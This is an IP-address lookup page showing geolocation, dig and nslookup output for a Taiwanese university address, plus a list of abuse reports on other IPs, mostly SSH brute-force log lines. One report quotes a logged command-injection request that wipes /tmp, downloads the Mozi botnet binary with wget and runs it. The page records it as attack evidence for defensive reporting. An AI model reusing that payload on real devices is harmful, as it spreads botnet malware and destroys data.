Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: Taipei

Region: Taipei

Country: Taiwan, China

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 140.119.57.20
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7278
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;140.119.57.20.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025021902 1800 900 604800 86400

;; Query time: 37 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Feb 20 13:16:31 CST 2025
;; MSG SIZE  rcvd: 106
Host info
20.57.119.140.in-addr.arpa domain name pointer cclsl-pub-B1F20.nccu.edu.tw.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
20.57.119.140.in-addr.arpa	name = cclsl-pub-B1F20.nccu.edu.tw.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
188.131.233.36 attack
Invalid user admin from 188.131.233.36 port 36704
2020-04-25 06:21:36
122.152.210.156 attackspam
invalid user qk from 122.152.210.156 port 47818
2020-04-25 06:22:34
91.234.62.171 attackbots
REQUESTED PAGE: /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
2020-04-25 06:14:31
113.209.194.202 attack
Apr 24 22:51:29 server sshd[12019]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.209.194.202
Apr 24 22:51:32 server sshd[12019]: Failed password for invalid user carlo from 113.209.194.202 port 48790 ssh2
Apr 24 22:52:24 server sshd[12096]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.209.194.202
...
2020-04-25 06:13:27
93.41.38.126 attackspam
Spammer
2020-04-25 05:54:05
111.230.236.93 attackspambots
web-1 [ssh] SSH Attack
2020-04-25 05:51:36
118.24.99.230 attackspambots
(sshd) Failed SSH login from 118.24.99.230 (CN/China/-): 5 in the last 3600 secs
2020-04-25 06:07:02
222.186.180.130 attackspam
Apr 24 21:57:16 IngegnereFirenze sshd[26303]: User root from 222.186.180.130 not allowed because not listed in AllowUsers
...
2020-04-25 06:01:44
51.68.190.223 attack
Invalid user sftpuser from 51.68.190.223 port 48872
2020-04-25 06:20:21
80.76.42.150 attackspambots
(sshd) Failed SSH login from 80.76.42.150 (RU/Russia/time20.lion1.icu): 5 in the last 3600 secs
2020-04-25 06:07:41
35.222.227.18 attack
Invalid user ubuntu from 35.222.227.18 port 58918
2020-04-25 06:16:53
45.148.10.68 attackspambots
Automatic report - Brute Force attack using this IP address
2020-04-25 05:53:32
51.79.55.107 attackbotsspam
$f2bV_matches
2020-04-25 05:57:11
192.210.192.165 attackspambots
Invalid user admin from 192.210.192.165 port 53388
2020-04-25 06:18:39
173.212.213.46 attack
Triggered: repeated knocking on closed ports.
2020-04-25 05:48:06

Recently Reported IPs

218.114.187.76 13.199.56.255 137.7.80.143 79.50.190.169
134.124.243.30 133.118.254.92 115.67.97.14 58.150.139.3
168.26.131.147 196.68.212.2 127.248.144.249 157.142.111.2
229.130.149.78 74.8.38.228 225.239.165.153 149.235.231.254
159.96.168.141 41.18.61.94 199.76.220.37 69.26.8.83